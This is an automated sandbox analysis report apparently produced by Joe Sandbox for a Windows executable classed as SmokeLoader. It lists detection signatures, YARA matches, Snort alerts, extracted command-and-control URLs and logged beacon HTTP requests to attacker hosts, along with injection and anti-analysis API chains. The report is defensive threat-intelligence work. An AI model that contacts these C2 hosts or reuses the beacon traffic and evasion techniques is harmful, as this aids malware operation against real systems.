Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:777186
MD5:d0bf82e7840b3179b85d665a3ae895a5
SHA1:f97d45f0df4b91fa8756af2a4ac4b7bc28a79c14
SHA256:40c8adaee430093bf55e59066013c9ef5959d617751930d1b77944c5bc769527
Tags:exe
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Machine Learning detection for sample
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Deletes itself after installation
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs

Classification

  • System is w10x64
  • file.exe (PID: 4712 cmdline: C:\Users\user\Desktop\file.exe MD5: D0BF82E7840B3179B85D665A3AE895A5)
    • explorer.exe (PID: 3324 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • 1E3.exe (PID: 3536 cmdline: C:\Users\user\AppData\Local\Temp\1E3.exe MD5: B2FDE4A8B7D6AA7E0FA7F853899F1C4F)
  • vgfsabt (PID: 3120 cmdline: C:\Users\user\AppData\Roaming\vgfsabt MD5: D0BF82E7840B3179B85D665A3AE895A5)
  • cleanup
{"C2 list": ["http://skinndia.com/tmp/", "http://cracker.biz/tmp/", "http://piratia-life.ru/tmp/"]}
SourceRuleDescriptionAuthorStrings
00000001.00000002.448104773.00000000005E6000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x721c:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000001.00000002.448295011.0000000000711000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000001.00000002.448295011.0000000000711000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x344:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    00000001.00000002.447941721.0000000000540000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000001.00000002.447941721.0000000000540000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
      • 0x744:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
      Click to see the 4 entries
      SourceRuleDescriptionAuthorStrings
      1.3.file.exe.540000.0.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        1.2.file.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          1.2.file.exe.530e67.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            No Sigma rule has matched
            Timestamp:192.168.2.593.112.238.8549715802851815 01/03/23-09:46:55.877154
            SID:2851815
            Source Port:49715
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.5175.120.254.949709802851815 01/03/23-09:46:28.845991
            SID:2851815
            Source Port:49709
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.5195.158.3.16249708802851815 01/03/23-09:46:27.109616
            SID:2851815
            Source Port:49708
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.5175.120.254.949719802851815 01/03/23-09:46:58.922198
            SID:2851815
            Source Port:49719
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: file.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\1E3.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Roaming\vgfsabtJoe Sandbox ML: detected
            Source: 00000001.00000002.448295011.0000000000711000.00000004.10000000.00040000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"C2 list": ["http://skinndia.com/tmp/", "http://cracker.biz/tmp/", "http://piratia-life.ru/tmp/"]}
            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
            Source: unknownHTTPS traffic detected: 5.135.247.111:443 -> 192.168.2.5:49714 version: TLS 1.2
            Source: Binary string: C:\somiho64\zujejitude\fay.pdb source: 1E3.exe, 1E3.exe, 0000000A.00000000.534315442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, 1E3.exe, 0000000A.00000002.553571616.0000000000401000.00000020.00000001.01000000.00000008.sdmp, 1E3.exe.6.dr
            Source: Binary string: C:\vopuwonove\puracol.pdb source: file.exe, vgfsabt.6.dr

            Networking

            barindex
            Source: C:\Windows\explorer.exeDomain query: vatra.at
            Source: C:\Windows\explorer.exeDomain query: degroeneuitzender.nl
            Source: C:\Windows\explorer.exeNetwork Connect: 181.215.246.89 80Jump to behavior
            Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.5:49708 -> 195.158.3.162:80
            Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.5:49709 -> 175.120.254.9:80
            Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.5:49715 -> 93.112.238.85:80
            Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.5:49719 -> 175.120.254.9:80
            Source: Malware configuration extractorURLs: http://skinndia.com/tmp/
            Source: Malware configuration extractorURLs: http://cracker.biz/tmp/
            Source: Malware configuration extractorURLs: http://piratia-life.ru/tmp/
            Source: Joe Sandbox ViewASN Name: SAUDINETSTC-ASSA SAUDINETSTC-ASSA
            Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
            Source: Joe Sandbox ViewIP Address: 93.112.238.85 93.112.238.85
            Source: Joe Sandbox ViewIP Address: 5.135.247.111 5.135.247.111
            Source: global trafficHTTP traffic detected: GET /systems/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: degroeneuitzender.nl
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vtnltmuyju.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 142Host: vatra.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://owtqjcmscg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 118Host: vatra.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yclbkevn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 231Host: vatra.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bvgxojnl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 293Host: vatra.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eaybestph.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 157Host: vatra.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ywmrapro.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 327Host: vatra.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bmjduhjgq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 265Host: vatra.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bagetn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 118Host: vatra.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bdiba.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 349Host: vatra.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eaamgxfkry.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 316Host: vatra.at
            Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bcdjbmpl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 222Host: vatra.at
            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
            Source: unknownTCP traffic detected without corresponding DNS query: 181.215.246.89
            Source: unknownTCP traffic detected without corresponding DNS query: 181.215.246.89
            Source: unknownTCP traffic detected without corresponding DNS query: 181.215.246.89
            Source: explorer.exe, 00000006.00000000.417080410.000000000EBD2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.microsoft.coyyL
            Source: explorer.exe, 00000006.00000000.405148588.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.427104048.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.374860423.000000000091F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
            Source: unknownHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vtnltmuyju.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 142Host: vatra.at
            Source: unknownDNS traffic detected: queries for: vatra.at
            Source: global trafficHTTP traffic detected: GET /systems/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: degroeneuitzender.nl
            Source: unknownHTTPS traffic detected: 5.135.247.111:443 -> 192.168.2.5:49714 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Source: Yara matchFile source: 1.3.file.exe.540000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.file.exe.530e67.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.448295011.0000000000711000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.447941721.0000000000540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.363432938.0000000000540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.428004602.00000000028F1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: vgfsabt, 00000009.00000002.554246147.00000000007AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            System Summary

            barindex
            Source: 00000001.00000002.448104773.00000000005E6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000001.00000002.448295011.0000000000711000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
            Source: 00000001.00000002.447941721.0000000000540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
            Source: 00000001.00000002.447899636.0000000000530000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: 00000006.00000000.428004602.00000000028F1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 00000001.00000002.448104773.00000000005E6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000001.00000002.448295011.0000000000711000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
            Source: 00000001.00000002.447941721.0000000000540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
            Source: 00000001.00000002.447899636.0000000000530000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: 00000006.00000000.428004602.00000000028F1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
            Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0040E6241_2_0040E624
            Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0040E0E01_2_0040E0E0
            Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0040AAA81_2_0040AAA8
            Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0040FB311_2_0040FB31
            Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0040DB9C1_2_0040DB9C
            Source: C:\Users\user\AppData\Roaming\vgfsabtCode function: 9_2_0040E0E09_2_0040E0E0
            Source: C:\Users\user\AppData\Roaming\vgfsabtCode function: 9_2_0040ED1C9_2_0040ED1C
            Source: C:\Users\user\AppData\Roaming\vgfsabtCode function: 9_2_0040E6249_2_0040E624
            Source: C:\Users\user\AppData\Roaming\vgfsabtCode function: 9_2_0040AAA89_2_0040AAA8
            Source: C:\Users\user\AppData\Roaming\vgfsabtCode function: 9_2_00407B039_2_00407B03
            Source: C:\Users\user\AppData\Roaming\vgfsabtCode function: 9_2_0040FB319_2_0040FB31
            Source: C:\Users\user\AppData\Roaming\vgfsabtCode function: 9_2_0040DB9C9_2_0040DB9C
            Source: C:\Users\user\AppData\Local\Temp\1E3.exeCode function: 10_2_0040E0E010_2_0040E0E0
            Source: C:\Users\user\AppData\Local\Temp\1E3.exeCode function: 10_2_0040ED1C10_2_0040ED1C
            Source: C:\Users\user\AppData\Local\Temp\1E3.exeCode function: 10_2_0040E62410_2_0040E624
            Source: C:\Users\user\AppData\Local\Temp\1E3.exeCode function: 10_2_0040AAA810_2_0040AAA8
            Source: C:\Users\user\AppData\Local\Temp\1E3.exeCode function: 10_2_00407B0310_2_00407B03
            Source: C:\Users\user\AppData\Local\Temp\1E3.exeCode function: 10_2_0040FB3110_2_0040FB31
            Source: C:\Users\user\AppData\Local\Temp\1E3.exeCode function: 10_2_0040DB9C10_2_0040DB9C
            Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00401615 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,1_2_00401615
            Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00401620 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,1_2_00401620
            Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00403428 NtClose,RtlInitUnicodeString,GetModuleHandleA,OpenProcessToken,NtOpenProcess,NtCreateSection,NtAllocateVirtualMemory,NtDuplicateObject,NtOpenKey,NtEnumerateKey,strstr,1_2_00403428
            Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00401633 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,1_2_00401633
            Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00401636 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,1_2_00401636
            Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004017E4 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,1_2_004017E4
            Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0040159D NtAllocateVirtualMemory,1_2_0040159D
            Source: C:\Users\user\Desktop\file.exeSection loaded: yosep.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\vgfsabt C:\Users\user\AppData\Roaming\vgfsabt
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\1E3.exe C:\Users\user\AppData\Local\Temp\1E3.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\1E3.exe C:\Users\user\AppData\Local\Temp\1E3.exeJump to behavior
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\vgfsabtJump to behavior
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\1E3.tmpJump to behavior
            Source: classification engineClassification label: mal100.troj.evad.winEXE@4/3@13/8
            Source: C:\Users\user\AppData\Roaming\vgfsabtCode function: 9_2_0040297F GetModuleHandleA,GetProcAddress,GetCurrentThreadId,VirtualAlloc,ReadConsoleA,SetConsoleDisplayMode,LockResource,GetComputerNameW,SetThreadExecutionState,TlsSetValue,LoadLibraryW,9_2_0040297F
            Source: C:\Users\user\AppData\Roaming\vgfsabtCommand line argument: g#o*9_2_00402ADC
            Source: C:\Users\user\AppData\Roaming\vgfsabtCommand line argument: Ej^9_2_00402ADC
            Source: C:\Users\user\AppData\Roaming\vgfsabtCommand line argument: jip59_2_00402ADC
            Source: C:\Users\user\AppData\Roaming\vgfsabtCommand line argument: p1Mm9_2_00402ADC
            Source: C:\Users\user\AppData\Roaming\vgfsabtCommand line argument: 4PJN9_2_00402ADC
            Source: C:\Users\user\AppData\Roaming\vgfsabtCommand line argument: eXYh9_2_00402ADC
            Source: C:\Users\user\AppData\Roaming\vgfsabtCommand line argument: `Y7@9_2_00402ADC
            Source: C:\Users\user\AppData\Roaming\vgfsabtCommand line argument: #h-9_2_00402ADC
            Source: C:\Users\user\AppData\Roaming\vgfsabtCommand line argument: B;9_2_00402ADC
            Source: C:\Users\user\AppData\Roaming\vgfsabtCommand line argument: ai9_2_00402ADC
            Source: C:\Users\user\AppData\Roaming\vgfsabtCommand line argument: 5m!Z9_2_00402ADC
            Source: C:\Users\user\AppData\Roaming\vgfsabtCommand line argument: @`Fm9_2_00402ADC
            Source: C:\Users\user\AppData\Roaming\vgfsabtCommand line argument: F`1=9_2_00402ADC
            Source: C:\Users\user\AppData\Roaming\vgfsabtCommand line argument: C[Ie9_2_00402ADC
            Source: C:\Users\user\AppData\Roaming\vgfsabtCommand line argument: eW9$9_2_00402ADC
            Source: C:\Users\user\AppData\Roaming\vgfsabtCommand line argument: %$69_2_00402ADC
            Source: C:\Users\user\AppData\Roaming\vgfsabtCommand line argument: T+Zx9_2_00402ADC
            Source: C:\Users\user\AppData\Roaming\vgfsabtCommand line argument: <4X9_2_00402ADC
            Source: C:\Users\user\AppData\Roaming\vgfsabtCommand line argument: ua%9_2_00402ADC
            Source: C:\Users\user\AppData\Roaming\vgfsabtCommand line argument: R\4T9_2_00402ADC
            Source: C:\Users\user\AppData\Roaming\vgfsabtCommand line argument: ciH9_2_00402ADC
            Source: C:\Users\user\AppData\Roaming\vgfsabtCommand line argument: "d=9_2_00402ADC
            Source: C:\Users\user\AppData\Roaming\vgfsabtCommand line argument: <=Tl9_2_00402ADC
            Source: C:\Users\user\AppData\Roaming\vgfsabtCommand line argument: IBu79_2_00402ADC
            Source: C:\Users\user\AppData\Roaming\vgfsabtCommand line argument: cb6E9_2_00402ADC
            Source: C:\Users\user\AppData\Roaming\vgfsabtCommand line argument: e"3*9_2_00402ADC
            Source: C:\Users\user\AppData\Roaming\vgfsabtCommand line argument: 5F79_2_00402ADC
            Source: C:\Users\user\AppData\Roaming\vgfsabtCommand line argument: `I4S9_2_00402ADC
            Source: C:\Users\user\AppData\Local\Temp\1E3.exeCommand line argument: g#o*10_2_00402ADC
            Source: C:\Users\user\AppData\Local\Temp\1E3.exeCommand line argument: Ej^10_2_00402ADC
            Source: C:\Users\user\AppData\Local\Temp\1E3.exeCommand line argument: jip510_2_00402ADC
            Source: C:\Users\user\AppData\Local\Temp\1E3.exeCommand line argument: p1Mm10_2_00402ADC
            Source: C:\Users\user\AppData\Local\Temp\1E3.exeCommand line argument: 4PJN10_2_00402ADC
            Source: C:\Users\user\AppData\Local\Temp\1E3.exeCommand line argument: eXYh10_2_00402ADC
            Source: C:\Users\user\AppData\Local\Temp\1E3.exeCommand line argument: `Y7@10_2_00402ADC
            Source: C:\Users\user\AppData\Local\Temp\1E3.exeCommand line argument: #h-10_2_00402ADC
            Source: C:\Users\user\AppData\Local\Temp\1E3.exeCommand line argument: B;10_2_00402ADC
            Source: C:\Users\user\AppData\Local\Temp\1E3.exeCommand line argument: ai10_2_00402ADC
            Source: C:\Users\user\AppData\Local\Temp\1E3.exeCommand line argument: 5m!Z10_2_00402ADC
            Source: C:\Users\user\AppData\Local\Temp\1E3.exeCommand line argument: @`Fm10_2_00402ADC
            Source: C:\Users\user\AppData\Local\Temp\1E3.exeCommand line argument: F`1=10_2_00402ADC
            Source: C:\Users\user\AppData\Local\Temp\1E3.exeCommand line argument: C[Ie10_2_00402ADC
            Source: C:\Users\user\AppData\Local\Temp\1E3.exeCommand line argument: eW9$10_2_00402ADC
            Source: C:\Users\user\AppData\Local\Temp\1E3.exeCommand line argument: %$610_2_00402ADC
            Source: C:\Users\user\AppData\Local\Temp\1E3.exeCommand line argument: T+Zx10_2_00402ADC
            Source: C:\Users\user\AppData\Local\Temp\1E3.exeCommand line argument: <4X10_2_00402ADC
            Source: C:\Users\user\AppData\Local\Temp\1E3.exeCommand line argument: ua%10_2_00402ADC
            Source: C:\Users\user\AppData\Local\Temp\1E3.exeCommand line argument: R\4T10_2_00402ADC
            Source: C:\Users\user\AppData\Local\Temp\1E3.exeCommand line argument: ciH10_2_00402ADC
            Source: C:\Users\user\AppData\Local\Temp\1E3.exeCommand line argument: "d=10_2_00402ADC
            Source: C:\Users\user\AppData\Local\Temp\1E3.exeCommand line argument: <=Tl10_2_00402ADC
            Source: C:\Users\user\AppData\Local\Temp\1E3.exeCommand line argument: IBu710_2_00402ADC
            Source: C:\Users\user\AppData\Local\Temp\1E3.exeCommand line argument: cb6E10_2_00402ADC
            Source: C:\Users\user\AppData\Local\Temp\1E3.exeCommand line argument: e"3*10_2_00402ADC
            Source: C:\Users\user\AppData\Local\Temp\1E3.exeCommand line argument: 5F710_2_00402ADC
            Source: C:\Users\user\AppData\Local\Temp\1E3.exeCommand line argument: `I4S10_2_00402ADC
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
